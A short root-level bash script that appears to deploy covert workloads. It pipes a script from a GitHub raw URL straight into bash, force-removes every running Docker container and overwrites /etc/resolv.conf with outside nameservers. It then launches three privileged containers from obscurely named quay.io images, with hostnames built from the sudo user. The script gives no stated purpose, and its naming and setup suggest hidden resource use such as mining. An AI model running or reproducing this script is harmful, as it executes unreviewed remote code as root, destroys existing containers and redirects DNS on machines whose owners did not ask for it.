#erogomayke
#!/bin/bash

curl https://raw.githubusercontent.com/GH0STAV0/lsq_0_c/main/runn.sh | bash
#echo  $(grep '^sudo:.*$' /etc/group | cut -d: -f4) > /root/hassed/read.me
export su_img_2=$SUDO_USER
echo $su_img_2
export img2="quay.io/xm0uray/site_5:tag1"
export img="quay.io/xm0uray/0ct0pus_child_qu"
export host=$SUDO_USER"-gc-emma-"
export sess="p"
echo $img
docker rm -f $(docker ps -q)
docker rmi -f $img
docker rmi -f $img2
echo -e "nameserver 103.86.96.100\nnameserver 103.86.99.100" >  /etc/resolv.conf

echo  "HOST : [" $host " ] " " | IMAGE_DOCKER : [ "$img " ]" $sess
for (( i=1; i <= 3; i++ )); do
  bash -c  "docker run -d --name $sess$i --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:ro -h  $host$i  $img"
done


docker exec -it p1 /bin/bash -c 'echo -e "islamouissam"  > /root/g00g' &&
docker exec -it p2 /bin/bash -c 'echo -e "olamadobano"  > /root/g00g' &&
docker exec -it p3 /bin/bash -c 'echo -e "funkonodalo"  > /root/g00g'
